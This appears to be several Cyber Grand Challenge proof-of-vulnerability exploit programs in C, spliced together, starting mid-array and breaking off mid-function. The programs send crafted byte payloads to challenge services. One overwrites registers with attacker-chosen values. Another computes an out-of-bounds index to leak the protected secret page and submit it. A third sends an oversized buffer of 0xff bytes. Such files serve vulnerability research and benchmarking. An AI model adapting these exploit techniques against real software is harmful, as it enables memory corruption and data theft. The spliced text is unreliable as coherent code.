"\x1e\x00\x00\x00\xbf\x1f\x1f\x1f\xe2\x41\x41\x41\x00\x00\x00\x00"
"\x12\x00\x00\x00\xc0\x1f\x1f\x1f\xe3\x41\x41\x41\x00\x00\x00\x00"
"\x06\x00\x00\x00\xc1\x1f\x1f\x1f\xe4\x41\x41\x41\x00\x00\x00\x00"
"\x06\x00\x00\x00\xc2\x1f\x1f\x1f\xe5\x41\x41\x41\x00\x00\x00\x00"
"\x20\x00\x00\x00\xc3\x1f\x1f\x1f\xe6\x41\x41\x41\x01\x00\x00\x00"
"\x07\x00\x00\x00\xc4\x1f\x1f\x1f\xe7\x41\x41\x41\x01\x00\x00\x00"
"\x1d\x00\x00\x00\xc5\x1f\x1f\x1f\xe8\x41\x41\x41\x00\x00\x00\x00"
"\x29\x00\x00\x00\xc6\x1f\x1f\x1f\xe9\x41\x41\x41\x01\x00\x00\x00"
"\x2f\x00\x00\x00\xc7\x1f\x1f\x1f\xea\x41\x41\x41\x01\x00\x00\x00"
"\x2d\x00\x00\x00\xc8\x1f\x1f\x1f\xeb\x41\x41\x41\x01\x00\x00\x00"
"\x17\x00\x00\x00\xc9\x1f\x1f\x1f\xec\x41\x41\x41\x00\x00\x00\x00"
"\x1d\x00\x00\x00\xca\x1f\x1f\x1f\xed\x41\x41\x41\x01\x00\x00\x00"
"\x23\x00\x00\x00\xcb\x1f\x1f\x1f\xee\x41\x41\x41\x00\x00\x00\x00"
"\x0e\x00\x00\x00\xcc\x1f\x1f\x1f\xef\x41\x41\x41\x01\x00\x00\x00"
"\x06\x00\x00\x00\xcd\x1f\x1f\x1f\xf0\x41\x41\x41\x01\x00\x00\x00"
"\x30\x00\x00\x00\xce\x1f\x1f\x1f\xf1\x41\x41\x41\x01\x00\x00\x00"
"\x09\x00\x00\x00\xcf\x1f\x1f\x1f\xf2\x41\x41\x41\x00\x00\x00\x00"
"\x1d\x00\x00\x00\xd0\x1f\x1f\x1f\xf3\x41\x41\x41\x00\x00\x00\x00"
"\x11\x00\x00\x00\xd1\x1f\x1f\x1f\xf4\x41\x41\x41\x01\x00\x00\x00"
"\x22\x00\x00\x00\xd2\x1f\x1f\x1f\xf5\x41\x41\x41\x01\x00\x00\x00"
"\x1a\x00\x00\x00\xd3\x1f\x1f\x1f\xf6\x41\x41\x41\x01\x00\x00\x00"
"\x08\x00\x00\x00\xd4\x1f\x1f\x1f\xf7\x41\x41\x41\x01\x00\x00\x00"
"\x27\x00\x00\x00\xd5\x1f\x1f\x1f\xf8\x41\x41\x41\x01\x00\x00\x00"
"\x13\x00\x00\x00\xd6\x1f\x1f\x1f\xf9\x41\x41\x41\x01\x00\x00\x00"
"\x1b\x00\x00\x00\xd7\x1f\x1f\x1f\xfa\x41\x41\x41\x00\x00\x00\x00"
"\x2b\x00\x00\x00\xd8\x1f\x1f\x1f\xfb\x41\x41\x41\x01\x00\x00\x00"
"\x17\x00\x00\x00\xd9\x1f\x1f\x1f\xfc\x41\x41\x41\x01\x00\x00\x00"
"\x28\x00\x00\x00\xda\x1f\x1f\x1f\xfd\x41\x41\x41\x01\x00\x00\x00"
"\x30\x00\x00\x00\xdb\x1f\x1f\x1f\xfe\x41\x41\x41\x00\x00\x00\x00"
"\x2b\x00\x00\x00\xdc\x1f\x1f\x1f\xff\x41\x41\x41\x00\x00\x00\x00"
"\x11\x00\x00\x00\xdd\x1f\x1f\x1f\x00\x42\x41\x41\x01\x00\x00\x00"
"\x22\x00\x00\x00\xde\x1f\x1f\x1f\x01\x42\x41\x41\x01\x00\x00\x00"
"\x14\x00\x00\x00\xdf\x1f\x1f\x1f\x02\x42\x41\x41\x01\x00\x00\x00"
"\x23\x00\x00\x00\xe0\x1f\x1f\x1f\x03\x42\x41\x41\x01\x00\x00\x00"
"\x20\x00\x00\x00\xe1\x1f\x1f\x1f\x04\x42\x41\x41\x01\x00\x00\x00"
"\x21\x00\x00\x00\xe2\x1f\x1f\x1f\x05\x42\x41\x41\x00\x00\x00\x00"
"\x0a\x00\x00\x00\xe3\x1f\x1f\x1f\x06\x42\x41\x41\x01\x00\x00\x00"
"\x0b\x00\x00\x00\xe4\x1f\x1f\x1f\x07\x42\x41\x41\x01\x00\x00\x00"
"\x0d\x00\x00\x00\xe5\x1f\x1f\x1f\x08\x42\x41\x41\x00\x00\x00\x00"
"\x27\x00\x00\x00\xe6\x1f\x1f\x1f";
static unsigned int write_00001_00000_len = 3208;
unsigned int *buf = (unsigned int *)write_00001_00000;
unsigned int buf_idx = 1; // buf[0] is command bytes
// unsigned int *buf = (unsigned int *)write_00001_00000;
unsigned int r_count = buf[buf_idx++]; // buf[1] is rider count
for (unsigned int i = 0; i < r_count; i++) {
buf[buf_idx] = t1vals.regval++; // id = regval
buf[buf_idx + 3] = t1vals.ipval++; // health_check = ipval
buf_idx += 4;
}
transmit_all(1, write_00001_00000, write_00001_00000_len);
free(buf);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length cgc_read
read_00001_len = 4;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x10\x11\x12\x13\x10\x27\x00\x00";
static unsigned int write_00002_00000_len = 8;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length cgc_read
read_00002_len = 4;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00003_00000[] =
"\x11\x22\x33\x11";
static unsigned int write_00003_00000_len = 4;
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length cgc_read
read_00003_len = 4;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00004_00000[] =
"\x10\x11\x12\x13\x10\x27\x00\x00";
static unsigned int write_00004_00000_len = 8;
unsigned char *write_00004 = NULL;
unsigned int write_00004_len = 0;
write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len);
if (write_00004_len > 0) {
transmit_all(1, write_00004, write_00004_len);
}
free(write_00004);
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length cgc_read
read_00004_len = 4;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
}
int main(void) {
negotiate_type1(0xfbfbfbfb, 0xfbfbfbfb, 2);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length read
read_00000_len = 260;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
//**** read match data
static unsigned char match_00000_00000[] =
"\x00\x00\x00\x00\x49\x4e\x49\x54\x53\x54\x41\x52\x54\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00";
read_00000_ptr += data_match(read_00000 + read_00000_ptr, read_00000_len - read_00000_ptr, match_00000_00000, 259);
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x24";
static unsigned int write_00000_00000_len = 13;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length read
read_00001_len = 260;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
//**** read match data
static unsigned char match_00001_00000[] =
"\x02\x00\x00\x00\x0a\x50\x61\x79\x6d\x65\x6e\x74\x73\x20\x6d\x61"
"\x64\x65\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x54\x69\x63"
"\x6b\x65\x74\x73\x20\x67\x69\x76\x65\x6e\x3a\x20\x30\x30\x30\x30"
"\x30\x30\x30\x30\x0a\x43\x6f\x75\x70\x6f\x6e\x73\x20\x75\x73\x65"
"\x64\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x47\x72\x6f\x73"
"\x73\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
"\x30\x30\x30\x0a\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x20\x63\x6f"
"\x73\x74\x73\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x4e\x65"
"\x74\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
"\x30\x30\x30\x0a\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00";
read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 259);
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x41\x41\x41\x41"
"\x41\x41\x41\x41\x24";
static unsigned int write_00001_00000_len = 21;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\xf3\xff\xff\xff\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static unsigned int write_00002_00000_len = 32;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
//*** writing data
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_var("TYPE1_REG", write_00003, &write_00003_len);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
do {
//*** writing data
static unsigned char write_00004_00000[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00";
static unsigned int write_00004_00000_len = 84;
unsigned char *write_00004 = NULL;
unsigned int write_00004_len = 0;
write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len);
if (write_00004_len > 0) {
transmit_all(1, write_00004, write_00004_len);
}
free(write_00004);
} while (0);
do {
//*** writing data
unsigned char *write_00005 = NULL;
unsigned int write_00005_len = 0;
write_00005 = append_var("TYPE1_IP", write_00005, &write_00005_len);
if (write_00005_len > 0) {
transmit_all(1, write_00005, write_00005_len);
}
free(write_00005);
} while (0);
do {
//*** writing data
static unsigned char write_00006_00000[] =
"\x24";
static unsigned int write_00006_00000_len = 1;
unsigned char *write_00006 = NULL;
unsigned int write_00006_len = 0;
write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len);
if (write_00006_len > 0) {
transmit_all(1, write_00006, write_00006_len);
}
free(write_00006);
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length read
read_00002_len = 260;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
//**** read match data
static unsigned char match_00002_00000[] =
"\x02\x00\x00\x00\x0a\x50\x61\x79\x6d\x65\x6e\x74\x73\x20\x6d\x61"
"\x64\x65\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x54\x69\x63"
"\x6b\x65\x74\x73\x20\x67\x69\x76\x65\x6e\x3a\x20\x30\x30\x30\x30"
"\x30\x30\x30\x30\x0a\x43\x6f\x75\x70\x6f\x6e\x73\x20\x75\x73\x65"
"\x64\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x47\x72\x6f\x73"
"\x73\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
"\x30\x30\x30\x0a\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x20\x63\x6f"
"\x73\x74\x73\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x4e\x65"
"\x74\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
"\x30\x30\x30\x0a\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00";
read_00002_ptr += data_match(read_00002 + read_00002_ptr, read_00002_len - read_00002_ptr, match_00002_00000, 259);
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length read
read_00003_len = 260;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
//**** read match data
static unsigned char match_00003_00000[] =
"\x03\x00\x00\x00\x64\x6f\x6e\x65\x2e\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00";
read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 259);
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
}
int main(void)
{
#ifndef DEBUG
xlat_seed("9an538n9av3;5");
#endif
char buf[1024];
int secrets = 0x4347c010;
const char* reg = "charlie" EOT_S;
const char* sub_self = "s" EOT_S "charlie" EOT_S;
const char* start_blub = "b" EOT_S;
const char* read_blubs = "r" EOT_S;
length_read(0, (unsigned char*)buf, 0x4);
#ifndef TESTING
unsigned char data[4];
type2_vals t2;
type2_negotiate(&t2);
#endif
send_string(1, reg);
length_read(0, (unsigned char*)buf, 0x4);
send_string(1, sub_self);
send_string(1, start_blub);
send_string(1, "adf");
transmit_all(1, &secrets, sizeof(secrets));
send_string(1, EOT_S);
send_string(1, read_blubs);
length_read(0, (unsigned char*)buf, 0x30);
length_read(0, (unsigned char*)buf, 0x4);
#ifndef DEBUG
size_t client_0_data = 0xb7e004f8;
#else
size_t client_0_data = 0xb7e000b8;
#endif
size_t secret_addr = (*(size_t*)buf) + 44;
int diff = secret_addr - client_0_data;
diff /= 4;
int idx = (2 << 29) - diff;
_convert_signed(buf, -idx, 10, 0);
char tosend[1024];
strcat(tosend, "y");
strcat(tosend, EOT_S);
strcat(tosend, "charlie");
strcat(tosend, EOT_S);
strcat(tosend, buf);
strcat(tosend, EOT_S);
send_string(1, tosend);
send_string(1, read_blubs);
const char* cgc_exit = "e" EOT_S;
send_string(1, cgc_exit);
#ifndef TESTING
length_read(0, (unsigned char*)buf, 336);
length_read(0, data, 4);
type2_submit(data, 4);
#endif
return 0;
}
int main(void) {
negotiate_type2();
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\x00\x00\x00\x00";
static unsigned int write_00000_00000_len = 4;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length read
read_00000_len = 4;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
//**** read assign to var "sessionA" from slice
assign_from_slice("sessionA", read_00000, read_00000_len - read_00000_ptr, 0, 0, 1);
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_var("sessionA", write_00001, &write_00001_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x00\x02";
static unsigned int write_00002_00000_len = 2;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
//*** writing data
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_var("sessionA", write_00003, &write_00003_len);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
do {
//*** writing data
static unsigned char write_00004_00000[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
static unsigned int write_00004_00000_len = 512;
unsigned char *write_00004 = NULL;
unsigned int write_00004_len = 0;
write_00004 = append_buf(write_00004, &write_00004_len, write_00004_00000, write_00004_00000_len);
if (write_00004_len > 0) {
transmit_all(1, write_00004, write_00004_len);
}
free(write_00004);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length read
read_00001_len = 4;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length read
read_00002_len = 256;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00005_00000[] =
"\x00\x00\x00\x00";
static unsigned int write_00005_00000_len = 4;
unsigned char *write_00005 = NULL;
unsigned int write_00005_len = 0;
write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len);
if (write_00005_len > 0) {
transmit_all(1, write_00005, write_00005_len);
}
free(write_00005);
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length read
read_00003_len = 4;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
//**** read assign to var "sessionB" from slice
assign_from_slice("sessionB", read_00003, read_00003_len - read_00003_ptr, 0, 0, 1);
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
unsigned char *write_00006 = NULL;
unsigned int write_00006_len = 0;
write_00006 = append_var("sessionB", write_00006, &write_00006_len);
if (write_00006_len > 0) {
transmit_all(1, write_00006, write_00006_len);
}
free(write_00006);
} while (0);
do {
//*** writing data
static unsigned char write_00007_00000[] =
"\x08\x00";
static unsigned int write_00007_00000_len = 2;
unsigned char *write_00007 = NULL;
unsigned int write_00007_len = 0;
write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len);
if (write_00007_len > 0) {
transmit_all(1, write_00007, write_00007_len);
}
free(write_00007);
} while (0);
do {
//*** writing data
unsigned char *write_00008 = NULL;
unsigned int write_00008_len = 0;
write_00008 = append_var("sessionB", write_00008, &write_00008_len);
if (write_00008_len > 0) {
transmit_all(1, write_00008, write_00008_len);
}
free(write_00008);
} while (0);
do {
//*** writing data
static unsigned char write_00009_00000[] =
"\x00\x00\x00\x00\x00\x00\x00\x00";
static unsigned int write_00009_00000_len = 8;
unsigned char *write_00009 = NULL;
unsigned int write_00009_len = 0;
write_00009 = append_buf(write_00009, &write_00009_len, write_00009_00000, write_00009_00000_len);
if (write_00009_len > 0) {
transmit_all(1, write_00009, write_00009_len);
}
free(write_00009);
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length read
read_00004_len = 4;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00005;
unsigned int read_00005_len;
unsigned int read_00005_ptr = 0;
//**** length read
read_00005_len = 256;
read_00005 = (unsigned char*)malloc(read_00005_len);
int read_00005_res = length_read(0, read_00005, read_00005_len);
if (read_00005_res) {} //silence unused variable warning
free(read_00005);
